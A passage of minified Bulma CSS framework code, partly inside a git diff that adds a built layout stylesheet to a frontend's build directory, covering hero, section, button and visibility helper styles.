1216px){.is-hidden-widescreen{display:none!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-hidden-widescreen-only{display:none!important}}@media screen and (min-width: 1408px){.is-hidden-fullhd{display:none!important}}.is-invisible{visibility:hidden!important}@media screen and (max-width: 768px){.is-invisible-mobile{visibility:hidden!important}}@media screen and (min-width: 769px),print{.is-invisible-tablet{visibility:hidden!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-invisible-tablet-only{visibility:hidden!important}}@media screen and (max-width: 1023px){.is-invisible-touch{visibility:hidden!important}}@media screen and (min-width: 1024px){.is-invisible-desktop{visibility:hidden!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-invisible-desktop-only{visibility:hidden!important}}@media screen and (min-width: 1216px){.is-invisible-widescreen{visibility:hidden!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-invisible-widescreen-only{visibility:hidden!important}}@media screen and (min-width: 1408px){.is-invisible-fullhd{visibility:hidden!important}}.hero{align-items:stretch;display:flex;flex-direction:column;justify-content:space-between}.hero .navbar{background:none}.hero .tabs ul{border-bottom:none}.hero.is-white{background-color:#fff;color:#0a0a0a}.hero.is-white a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-white strong{color:inherit}.hero.is-white .title{color:#0a0a0a}.hero.is-white .subtitle{color:#0a0a0ae6}.hero.is-white .subtitle a:not(.button),.hero.is-white .subtitle strong{color:#0a0a0a}@media screen and (max-width: 1023px){.hero.is-white .navbar-menu{background-color:#fff}}.hero.is-white .navbar-item,.hero.is-white .navbar-link{color:#0a0a0ab3}.hero.is-white a.navbar-item:hover,.hero.is-white a.navbar-item.is-active,.hero.is-white .navbar-link:hover,.hero.is-white .navbar-link.is-active{background-color:#f2f2f2;color:#0a0a0a}.hero.is-white .tabs a{color:#0a0a0a;opacity:.9}.hero.is-white .tabs a:hover{opacity:1}.hero.is-white .tabs li.is-active a{color:#fff!important;opacity:1}.hero.is-white .tabs.is-boxed a,.hero.is-white .tabs.is-toggle a{color:#0a0a0a}.hero.is-white .tabs.is-boxed a:hover,.hero.is-white .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-white .tabs.is-boxed li.is-active a,.hero.is-white .tabs.is-boxed li.is-active a:hover,.hero.is-white .tabs.is-toggle li.is-active a,.hero.is-white .tabs.is-toggle li.is-active a:hover{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.hero.is-white.is-bold{background-image:linear-gradient(141deg,#e6e6e6 0%,white 71%,white 100%)}@media screen and (max-width: 768px){.hero.is-white.is-bold .navbar-menu{background-image:linear-gradient(141deg,#e6e6e6 0%,white 71%,white 100%)}}.hero.is-black{background-color:#0a0a0a;color:#fff}.hero.is-black a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-black strong{color:inherit}.hero.is-black .title{color:#fff}.hero.is-black .subtitle{color:#ffffffe6}.hero.is-black .subtitle a:not(.button),.hero.is-black .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-black .navbar-menu{background-color:#0a0a0a}}.hero.is-black .navbar-item,.hero.is-black .navbar-link{color:#ffffffb3}.hero.is-black a.navbar-item:hover,.hero.is-black a.navbar-item.is-active,.hero.is-black .navbar-link:hover,.hero.is-black .navbar-link.is-active{background-color:#000;color:#fff}.hero.is-black .tabs a{color:#fff;opacity:.9}.hero.is-black .tabs a:hover{opacity:1}.hero.is-black .tabs li.is-active a{color:#0a0a0a!important;opacity:1}.hero.is-black .tabs.is-boxed a,.hero.is-black .tabs.is-toggle a{color:#fff}.hero.is-black .tabs.is-boxed a:hover,.hero.is-black .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-black .tabs.is-boxed li.is-active a,.hero.is-black .tabs.is-boxed li.is-active a:hover,.hero.is-black .tabs.is-toggle li.is-active a,.hero.is-black .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#0a0a0a}.hero.is-black.is-bold{background-image:linear-gradient(141deg,black 0%,#0a0a0a 71%,#181616 100%)}@media screen and (max-width: 768px){.hero.is-black.is-bold .navbar-menu{background-image:linear-gradient(141deg,black 0%,#0a0a0a 71%,#181616 100%)}}.hero.is-light{background-color:#f5f5f5;color:#000000b3}.hero.is-light a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-light strong{color:inherit}.hero.is-light .title{color:#000000b3}.hero.is-light .subtitle{color:#000000e6}.hero.is-light .subtitle a:not(.button),.hero.is-light .subtitle strong{color:#000000b3}@media screen and (max-width: 1023px){.hero.is-light .navbar-menu{background-color:#f5f5f5}}.hero.is-light .navbar-item,.hero.is-light .navbar-link{color:#000000b3}.hero.is-light a.navbar-item:hover,.hero.is-light a.navbar-item.is-active,.hero.is-light .navbar-link:hover,.hero.is-light .navbar-link.is-active{background-color:#e8e8e8;color:#000000b3}.hero.is-light .tabs a{color:#000000b3;opacity:.9}.hero.is-light .tabs a:hover{opacity:1}.hero.is-light .tabs li.is-active a{color:#f5f5f5!important;opacity:1}.hero.is-light .tabs.is-boxed a,.hero.is-light .tabs.is-toggle a{color:#000000b3}.hero.is-light .tabs.is-boxed a:hover,.hero.is-light .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-light .tabs.is-boxed li.is-active a,.hero.is-light .tabs.is-boxed li.is-active a:hover,.hero.is-light .tabs.is-toggle li.is-active a,.hero.is-light .tabs.is-toggle li.is-active a:hover{background-color:#000000b3;border-color:#000000b3;color:#f5f5f5}.hero.is-light.is-bold{background-image:linear-gradient(141deg,#dfd8d9 0%,whitesmoke 71%,white 100%)}@media screen and (max-width: 768px){.hero.is-light.is-bold .navbar-menu{background-image:linear-gradient(141deg,#dfd8d9 0%,whitesmoke 71%,white 100%)}}.hero.is-dark{background-color:#363636;color:#fff}.hero.is-dark a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-dark strong{color:inherit}.hero.is-dark .title{color:#fff}.hero.is-dark .subtitle{color:#ffffffe6}.hero.is-dark .subtitle a:not(.button),.hero.is-dark .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-dark .navbar-menu{background-color:#363636}}.hero.is-dark .navbar-item,.hero.is-dark .navbar-link{color:#ffffffb3}.hero.is-dark a.navbar-item:hover,.hero.is-dark a.navbar-item.is-active,.hero.is-dark .navbar-link:hover,.hero.is-dark .navbar-link.is-active{background-color:#292929;color:#fff}.hero.is-dark .tabs a{color:#fff;opacity:.9}.hero.is-dark .tabs a:hover{opacity:1}.hero.is-dark .tabs li.is-active a{color:#363636!important;opacity:1}.hero.is-dark .tabs.is-boxed a,.hero.is-dark .tabs.is-toggle a{color:#fff}.hero.is-dark .tabs.is-boxed a:hover,.hero.is-dark .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-dark .tabs.is-boxed li.is-active a,.hero.is-dark .tabs.is-boxed li.is-active a:hover,.hero.is-dark .tabs.is-toggle li.is-active a,.hero.is-dark .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#363636}.hero.is-dark.is-bold{background-image:linear-gradient(141deg,#1f191a 0%,#363636 71%,#46403f 100%)}@media screen and (max-width: 768px){.hero.is-dark.is-bold .navbar-menu{background-image:linear-gradient(141deg,#1f191a 0%,#363636 71%,#46403f 100%)}}.hero.is-primary{background-color:#00d1b2;color:#fff}.hero.is-primary a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-primary strong{color:inherit}.hero.is-primary .title{color:#fff}.hero.is-primary .subtitle{color:#ffffffe6}.hero.is-primary .subtitle a:not(.button),.hero.is-primary .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-primary .navbar-menu{background-color:#00d1b2}}.hero.is-primary .navbar-item,.hero.is-primary .navbar-link{color:#ffffffb3}.hero.is-primary a.navbar-item:hover,.hero.is-primary a.navbar-item.is-active,.hero.is-primary .navbar-link:hover,.hero.is-primary .navbar-link.is-active{background-color:#00b89c;color:#fff}.hero.is-primary .tabs a{color:#fff;opacity:.9}.hero.is-primary .tabs a:hover{opacity:1}.hero.is-primary .tabs li.is-active a{color:#00d1b2!important;opacity:1}.hero.is-primary .tabs.is-boxed a,.hero.is-primary .tabs.is-toggle a{color:#fff}.hero.is-primary .tabs.is-boxed a:hover,.hero.is-primary .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-primary .tabs.is-boxed li.is-active a,.hero.is-primary .tabs.is-boxed li.is-active a:hover,.hero.is-primary .tabs.is-toggle li.is-active a,.hero.is-primary .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#00d1b2}.hero.is-primary.is-bold{background-image:linear-gradient(141deg,#009e6c 0%,#00d1b2 71%,#00e7eb 100%)}@media screen and (max-width: 768px){.hero.is-primary.is-bold .navbar-menu{background-image:linear-gradient(141deg,#009e6c 0%,#00d1b2 71%,#00e7eb 100%)}}.hero.is-link{background-color:#485fc7;color:#fff}.hero.is-link a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-link strong{color:inherit}.hero.is-link .title{color:#fff}.hero.is-link .subtitle{color:#ffffffe6}.hero.is-link .subtitle a:not(.button),.hero.is-link .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-link .navbar-menu{background-color:#485fc7}}.hero.is-link .navbar-item,.hero.is-link .navbar-link{color:#ffffffb3}.hero.is-link a.navbar-item:hover,.hero.is-link a.navbar-item.is-active,.hero.is-link .navbar-link:hover,.hero.is-link .navbar-link.is-active{background-color:#3a51bb;color:#fff}.hero.is-link .tabs a{color:#fff;opacity:.9}.hero.is-link .tabs a:hover{opacity:1}.hero.is-link .tabs li.is-active a{color:#485fc7!important;opacity:1}.hero.is-link .tabs.is-boxed a,.hero.is-link .tabs.is-toggle a{color:#fff}.hero.is-link .tabs.is-boxed a:hover,.hero.is-link .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-link .tabs.is-boxed li.is-active a,.hero.is-link .tabs.is-boxed li.is-active a:hover,.hero.is-link .tabs.is-toggle li.is-active a,.hero.is-link .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#485fc7}.hero.is-link.is-bold{background-image:linear-gradient(141deg,#2959b3 0%,#485fc7 71%,#5658d2 100%)}@media screen and (max-width: 768px){.hero.is-link.is-bold .navbar-menu{background-image:linear-gradient(141deg,#2959b3 0%,#485fc7 71%,#5658d2 100%)}}.hero.is-info{background-color:#3e8ed0;color:#fff}.hero.is-info a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-info strong{color:inherit}.hero.is-info .title{color:#fff}.hero.is-info .subtitle{color:#ffffffe6}.hero.is-info .subtitle a:not(.button),.hero.is-info .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-info .navbar-menu{background-color:#3e8ed0}}.hero.is-info .navbar-item,.hero.is-info .navbar-link{color:#ffffffb3}.hero.is-info a.navbar-item:hover,.hero.is-info a.navbar-item.is-active,.hero.is-info .navbar-link:hover,.hero.is-info .navbar-link.is-active{background-color:#3082c5;color:#fff}.hero.is-info .tabs a{color:#fff;opacity:.9}.hero.is-info .tabs a:hover{opacity:1}.hero.is-info .tabs li.is-active a{color:#3e8ed0!important;opacity:1}.hero.is-info .tabs.is-boxed a,.hero.is-info .tabs.is-toggle a{color:#fff}.hero.is-info .tabs.is-boxed a:hover,.hero.is-info .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-info .tabs.is-boxed li.is-active a,.hero.is-info .tabs.is-boxed li.is-active a:hover,.hero.is-info .tabs.is-toggle li.is-active a,.hero.is-info .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#3e8ed0}.hero.is-info.is-bold{background-image:linear-gradient(141deg,#208fbc 0%,#3e8ed0 71%,#4d83db 100%)}@media screen and (max-width: 768px){.hero.is-info.is-bold .navbar-menu{background-image:linear-gradient(141deg,#208fbc 0%,#3e8ed0 71%,#4d83db 100%)}}.hero.is-success{background-color:#48c78e;color:#fff}.hero.is-success a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-success strong{color:inherit}.hero.is-success .title{color:#fff}.hero.is-success .subtitle{color:#ffffffe6}.hero.is-success .subtitle a:not(.button),.hero.is-success .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-success .navbar-menu{background-color:#48c78e}}.hero.is-success .navbar-item,.hero.is-success .navbar-link{color:#ffffffb3}.hero.is-success a.navbar-item:hover,.hero.is-success a.navbar-item.is-active,.hero.is-success .navbar-link:hover,.hero.is-success .navbar-link.is-active{background-color:#3abb81;color:#fff}.hero.is-success .tabs a{color:#fff;opacity:.9}.hero.is-success .tabs a:hover{opacity:1}.hero.is-success .tabs li.is-active a{color:#48c78e!important;opacity:1}.hero.is-success .tabs.is-boxed a,.hero.is-success .tabs.is-toggle a{color:#fff}.hero.is-success .tabs.is-boxed a:hover,.hero.is-success .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-success .tabs.is-boxed li.is-active a,.hero.is-success .tabs.is-boxed li.is-active a:hover,.hero.is-success .tabs.is-toggle li.is-active a,.hero.is-success .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#48c78e}.hero.is-success.is-bold{background-image:linear-gradient(141deg,#29b35e 0%,#48c78e 71%,#56d2af 100%)}@media screen and (max-width: 768px){.hero.is-success.is-bold .navbar-menu{background-image:linear-gradient(141deg,#29b35e 0%,#48c78e 71%,#56d2af 100%)}}.hero.is-warning{background-color:#ffe08a;color:#000000b3}.hero.is-warning a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-warning strong{color:inherit}.hero.is-warning .title{color:#000000b3}.hero.is-warning .subtitle{color:#000000e6}.hero.is-warning .subtitle a:not(.button),.hero.is-warning .subtitle strong{color:#000000b3}@media screen and (max-width: 1023px){.hero.is-warning .navbar-menu{background-color:#ffe08a}}.hero.is-warning .navbar-item,.hero.is-warning .navbar-link{color:#000000b3}.hero.is-warning a.navbar-item:hover,.hero.is-warning a.navbar-item.is-active,.hero.is-warning .navbar-link:hover,.hero.is-warning .navbar-link.is-active{background-color:#ffd970;color:#000000b3}.hero.is-warning .tabs a{color:#000000b3;opacity:.9}.hero.is-warning .tabs a:hover{opacity:1}.hero.is-warning .tabs li.is-active a{color:#ffe08a!important;opacity:1}.hero.is-warning .tabs.is-boxed a,.hero.is-warning .tabs.is-toggle a{color:#000000b3}.hero.is-warning .tabs.is-boxed a:hover,.hero.is-warning .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-warning .tabs.is-boxed li.is-active a,.hero.is-warning .tabs.is-boxed li.is-active a:hover,.hero.is-warning .tabs.is-toggle li.is-active a,.hero.is-warning .tabs.is-toggle li.is-active a:hover{background-color:#000000b3;border-color:#000000b3;color:#ffe08a}.hero.is-warning.is-bold{background-image:linear-gradient(141deg,#ffb657 0%,#ffe08a 71%,#fff6a3 100%)}@media screen and (max-width: 768px){.hero.is-warning.is-bold .navbar-menu{background-image:linear-gradient(141deg,#ffb657 0%,#ffe08a 71%,#fff6a3 100%)}}.hero.is-danger{background-color:#f14668;color:#fff}.hero.is-danger a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-danger strong{color:inherit}.hero.is-danger .title{color:#fff}.hero.is-danger .subtitle{color:#ffffffe6}.hero.is-danger .subtitle a:not(.button),.hero.is-danger .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-danger .navbar-menu{background-color:#f14668}}.hero.is-danger .navbar-item,.hero.is-danger .navbar-link{color:#ffffffb3}.hero.is-danger a.navbar-item:hover,.hero.is-danger a.navbar-item.is-active,.hero.is-danger .navbar-link:hover,.hero.is-danger .navbar-link.is-active{background-color:#ef2e55;color:#fff}.hero.is-danger .tabs a{color:#fff;opacity:.9}.hero.is-danger .tabs a:hover{opacity:1}.hero.is-danger .tabs li.is-active a{color:#f14668!important;opacity:1}.hero.is-danger .tabs.is-boxed a,.hero.is-danger .tabs.is-toggle a{color:#fff}.hero.is-danger .tabs.is-boxed a:hover,.hero.is-danger .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-danger .tabs.is-boxed li.is-active a,.hero.is-danger .tabs.is-boxed li.is-active a:hover,.hero.is-danger .tabs.is-toggle li.is-active a,.hero.is-danger .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#f14668}.hero.is-danger.is-bold{background-image:linear-gradient(141deg,#fa0a62 0%,#f14668 71%,#f7595f 100%)}@media screen and (max-width: 768px){.hero.is-danger.is-bold .navbar-menu{background-image:linear-gradient(141deg,#fa0a62 0%,#f14668 71%,#f7595f 100%)}}.hero.is-small .hero-body{padding:1.5rem}@media screen and (min-width: 769px),print{.hero.is-medium .hero-body{padding:9rem 4.5rem}}@media screen and (min-width: 769px),print{.hero.is-large .hero-body{padding:18rem 6rem}}.hero.is-halfheight .hero-body,.hero.is-fullheight .hero-body,.hero.is-fullheight-with-navbar .hero-body{align-items:center;display:flex}.hero.is-halfheight .hero-body>.container,.hero.is-fullheight .hero-body>.container,.hero.is-fullheight-with-navbar .hero-body>.container{flex-grow:1;flex-shrink:1}.hero.is-halfheight{min-height:50vh}.hero.is-fullheight{min-height:100vh}.hero-video{overflow:hidden}.hero-video video{left:50%;min-height:100%;min-width:100%;position:absolute;top:50%;transform:translate3d(-50%,-50%,0)}.hero-video.is-transparent{opacity:.3}@media screen and (max-width: 768px){.hero-video{display:none}}.hero-buttons{margin-top:1.5rem}@media screen and (max-width: 768px){.hero-buttons .button{display:flex}.hero-buttons .button:not(:last-child){margin-bottom:.75rem}}@media screen and (min-width: 769px),print{.hero-buttons{display:flex;justify-content:center}.hero-buttons .button:not(:last-child){margin-right:1.5rem}}.hero-head,.hero-foot{flex-grow:0;flex-shrink:0}.hero-body{flex-grow:1;flex-shrink:0;padding:3rem 1.5rem}@media screen and (min-width: 769px),print{.hero-body{padding:3rem}}.section{padding:3rem 1.5rem}@media screen and (min-width: 1024px){.section{padding:3rem}.section.is-medium{padding:9rem 4.5rem}.section.is-large{padding:18rem 6rem}}.footer{background-color:#fafafa;padding:3rem 1.5rem 6rem} diff --git a/services/explorers/front/build/_app/immutable/assets/_layout.33736ff6.css b/services/explorers/front/build/_app/immutable/assets/_layout.33736ff6.css new file mode 100644 index 0000000..16eef92 --- /dev/null +++ b/services/explorers/front/build/_app/immutable/assets/_layout.33736ff6.css @@ -0,0 +1 @@ +/*! bulma.io v0.9.4 | MIT License | github.com/jgthms/bulma */.button,.input,.textarea,.select select,.file-cta,.file-name,.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis{-moz-appearance:none;-webkit-appearance:none;align-items:center;border:1px solid transparent;border-radius:4px;box-shadow:none;display:inline-flex;font-size:1rem;height:2.5em;justify-content:flex-start;line-height:1.5;padding-bottom:calc(.5em - 1px);padding-left:calc(.75em - 1px);padding-right:calc(.75em - 1px);padding-top:calc(.5em - 1px);position:relative;vertical-align:top}.button:focus,.input:focus,.textarea:focus,.select select:focus,.file-cta:focus,.file-name:focus,.pagination-previous:focus,.pagination-next:focus,.pagination-link:focus,.pagination-ellipsis:focus,.is-focused.button,.is-focused.input,.is-focused.textarea,.select select.is-focused,.is-focused.file-cta,.is-focused.file-name,.is-focused.pagination-previous,.is-focused.pagination-next,.is-focused.pagination-link,.is-focused.pagination-ellipsis,.button:active,.input:active,.textarea:active,.select select:active,.file-cta:active,.file-name:active,.pagination-previous:active,.pagination-next:active,.pagination-link:active,.pagination-ellipsis:active,.is-active.button,.is-active.input,.is-active.textarea,.select select.is-active,.is-active.file-cta,.is-active.file-name,.is-active.pagination-previous,.is-active.pagination-next,.is-active.pagination-link,.is-active.pagination-ellipsis{outline:none}.button[disabled],.input[disabled],.textarea[disabled],.select select[disabled],.file-cta[disabled],.file-name[disabled],.pagination-previous[disabled],.pagination-next[disabled],.pagination-link[disabled],.pagination-ellipsis[disabled],fieldset[disabled] .button,fieldset[disabled] .input,fieldset[disabled] .textarea,fieldset[disabled] .select select,.select fieldset[disabled] select,fieldset[disabled] .file-cta,fieldset[disabled] .file-name,fieldset[disabled] .pagination-previous,fieldset[disabled] .pagination-next,fieldset[disabled] .pagination-link,fieldset[disabled] .pagination-ellipsis{cursor:not-allowed}.button,.file,.breadcrumb,.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis,.tabs,.is-unselectable{-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.select:not(.is-multiple):not(.is-loading):after,.navbar-link:not(.is-arrowless):after{border:3px solid transparent;border-radius:2px;border-right:0;border-top:0;content:" ";display:block;height:.625em;margin-top:-.4375em;pointer-events:none;position:absolute;top:50%;transform:rotate(-45deg);transform-origin:center;width:.625em}.box:not(:last-child),.content:not(:last-child),.notification:not(:last-child),.progress:not(:last-child),.table:not(:last-child),.table-container:not(:last-child),.title:not(:last-child),.subtitle:not(:last-child),.block:not(:last-child),.breadcrumb:not(:last-child),.level:not(:last-child),.message:not(:last-child),.pagination:not(:last-child),.tabs:not(:last-child){margin-bottom:1.5rem}.delete,.modal-close{-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-moz-appearance:none;-webkit-appearance:none;background-color:#0a0a0a33;border:none;border-radius:9999px;cursor:pointer;pointer-events:auto;display:inline-block;flex-grow:0;flex-shrink:0;font-size:0;height:20px;max-height:20px;max-width:20px;min-height:20px;min-width:20px;outline:none;position:relative;vertical-align:top;width:20px}.delete:before,.modal-close:before,.delete:after,.modal-close:after{background-color:#fff;content:"";display:block;left:50%;position:absolute;top:50%;transform:translate(-50%) translateY(-50%) rotate(45deg);transform-origin:center center}.delete:before,.modal-close:before{height:2px;width:50%}.delete:after,.modal-close:after{height:50%;width:2px}.delete:hover,.modal-close:hover,.delete:focus,.modal-close:focus{background-color:#0a0a0a4d}.delete:active,.modal-close:active{background-color:#0a0a0a66}.is-small.delete,.is-small.modal-close{height:16px;max-height:16px;max-width:16px;min-height:16px;min-width:16px;width:16px}.is-medium.delete,.is-medium.modal-close{height:24px;max-height:24px;max-width:24px;min-height:24px;min-width:24px;width:24px}.is-large.delete,.is-large.modal-close{height:32px;max-height:32px;max-width:32px;min-height:32px;min-width:32px;width:32px}.button.is-loading:after,.loader,.select.is-loading:after,.control.is-loading:after{-webkit-animation:spinAround .5s infinite linear;animation:spinAround .5s infinite linear;border:2px solid #dbdbdb;border-radius:9999px;border-right-color:transparent;border-top-color:transparent;content:"";display:block;height:1em;position:relative;width:1em}.image.is-square img,.image.is-square .has-ratio,.image.is-1by1 img,.image.is-1by1 .has-ratio,.image.is-5by4 img,.image.is-5by4 .has-ratio,.image.is-4by3 img,.image.is-4by3 .has-ratio,.image.is-3by2 img,.image.is-3by2 .has-ratio,.image.is-5by3 img,.image.is-5by3 .has-ratio,.image.is-16by9 img,.image.is-16by9 .has-ratio,.image.is-2by1 img,.image.is-2by1 .has-ratio,.image.is-3by1 img,.image.is-3by1 .has-ratio,.image.is-4by5 img,.image.is-4by5 .has-ratio,.image.is-3by4 img,.image.is-3by4 .has-ratio,.image.is-2by3 img,.image.is-2by3 .has-ratio,.image.is-3by5 img,.image.is-3by5 .has-ratio,.image.is-9by16 img,.image.is-9by16 .has-ratio,.image.is-1by2 img,.image.is-1by2 .has-ratio,.image.is-1by3 img,.image.is-1by3 .has-ratio,.modal,.modal-background,.is-overlay,.hero-video{inset:0;position:absolute}.navbar-burger{-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;color:currentColor;font-family:inherit;font-size:1em;margin:0;padding:0}/*! minireset.css v0.0.6 | MIT License | github.com/jgthms/minireset.css */html,body,p,ol,ul,li,dl,dt,dd,blockquote,figure,fieldset,legend,textarea,pre,iframe,hr,h1,h2,h3,h4,h5,h6{margin:0;padding:0}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:400}ul{list-style:none}button,input,select,textarea{margin:0}html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}img,video{height:auto;max-width:100%}iframe{border:0}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}td:not([align]),th:not([align]){text-align:inherit}html{background-color:#fff;font-size:16px;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;min-width:300px;overflow-x:hidden;overflow-y:scroll;text-rendering:optimizeLegibility;-webkit-text-size-adjust:100%;-moz-text-size-adjust:100%;text-size-adjust:100%}article,aside,figure,footer,header,hgroup,section{display:block}body,button,input,optgroup,select,textarea{font-family:BlinkMacSystemFont,-apple-system,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,Helvetica,Arial,sans-serif}code,pre{-moz-osx-font-smoothing:auto;-webkit-font-smoothing:auto;font-family:monospace}body{color:#4a4a4a;font-size:1em;font-weight:400;line-height:1.5}a{color:#485fc7;cursor:pointer;text-decoration:none}a strong{color:currentColor}a:hover{color:#363636}code{background-color:#f5f5f5;color:#da1039;font-size:.875em;font-weight:400;padding:.25em .5em}hr{background-color:#f5f5f5;border:none;display:block;height:2px;margin:1.5rem 0}img{height:auto;max-width:100%}input[type=checkbox],input[type=radio]{vertical-align:baseline}small{font-size:.875em}span{font-style:inherit;font-weight:inherit}strong{color:#363636;font-weight:700}fieldset{border:none}pre{-webkit-overflow-scrolling:touch;background-color:#f5f5f5;color:#4a4a4a;font-size:.875em;overflow-x:auto;padding:1.25rem 1.5rem;white-space:pre;word-wrap:normal}pre code{background-color:transparent;color:currentColor;font-size:1em;padding:0}table td,table th{vertical-align:top}table td:not([align]),table th:not([align]){text-align:inherit}table th{color:#363636}@-webkit-keyframes spinAround{0%{transform:rotate(0)}to{transform:rotate(359deg)}}@keyframes spinAround{0%{transform:rotate(0)}to{transform:rotate(359deg)}}.box{background-color:#fff;border-radius:6px;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;color:#4a4a4a;display:block;padding:1.25rem}a.box:hover,a.box:focus{box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #485fc7}a.box:active{box-shadow:inset 0 1px 2px #0a0a0a33,0 0 0 1px #485fc7}.button{background-color:#fff;border-color:#dbdbdb;border-width:1px;color:#363636;cursor:pointer;justify-content:center;padding-bottom:calc(.5em - 1px);padding-left:1em;padding-right:1em;padding-top:calc(.5em - 1px);text-align:center;white-space:nowrap}.button strong{color:inherit}.button .icon,.button .icon.is-small,.button .icon.is-medium,.button .icon.is-large{height:1.5em;width:1.5em}.button .icon:first-child:not(:last-child){margin-left:calc(-.5em - 1px);margin-right:.25em}.button .icon:last-child:not(:first-child){margin-left:.25em;margin-right:calc(-.5em - 1px)}.button .icon:first-child:last-child{margin-left:calc(-.5em - 1px);margin-right:calc(-.5em - 1px)}.button:hover,.button.is-hovered{border-color:#b5b5b5;color:#363636}.button:focus,.button.is-focused{border-color:#485fc7;color:#363636}.button:focus:not(:active),.button.is-focused:not(:active){box-shadow:0 0 0 .125em #485fc740}.button:active,.button.is-active{border-color:#4a4a4a;color:#363636}.button.is-text{background-color:transparent;border-color:transparent;color:#4a4a4a;text-decoration:underline}.button.is-text:hover,.button.is-text.is-hovered,.button.is-text:focus,.button.is-text.is-focused{background-color:#f5f5f5;color:#363636}.button.is-text:active,.button.is-text.is-active{background-color:#e8e8e8;color:#363636}.button.is-text[disabled],fieldset[disabled] .button.is-text{background-color:transparent;border-color:transparent;box-shadow:none}.button.is-ghost{background:none;border-color:transparent;color:#485fc7;text-decoration:none}.button.is-ghost:hover,.button.is-ghost.is-hovered{color:#485fc7;text-decoration:underline}.button.is-white{background-color:#fff;border-color:transparent;color:#0a0a0a}.button.is-white:hover,.button.is-white.is-hovered{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.button.is-white:focus,.button.is-white.is-focused{border-color:transparent;color:#0a0a0a}.button.is-white:focus:not(:active),.button.is-white.is-focused:not(:active){box-shadow:0 0 0 .125em #ffffff40}.button.is-white:active,.button.is-white.is-active{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.button.is-white[disabled],fieldset[disabled] .button.is-white{background-color:#fff;border-color:#fff;box-shadow:none}.button.is-white.is-inverted{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted:hover,.button.is-white.is-inverted.is-hovered{background-color:#000}.button.is-white.is-inverted[disabled],fieldset[disabled] .button.is-white.is-inverted{background-color:#0a0a0a;border-color:transparent;box-shadow:none;color:#fff}.button.is-white.is-loading:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-white.is-outlined:hover,.button.is-white.is-outlined.is-hovered,.button.is-white.is-outlined:focus,.button.is-white.is-outlined.is-focused{background-color:#fff;border-color:#fff;color:#0a0a0a}.button.is-white.is-outlined.is-loading:after{border-color:transparent transparent white white!important}.button.is-white.is-outlined.is-loading:hover:after,.button.is-white.is-outlined.is-loading.is-hovered:after,.button.is-white.is-outlined.is-loading:focus:after,.button.is-white.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined[disabled],fieldset[disabled] 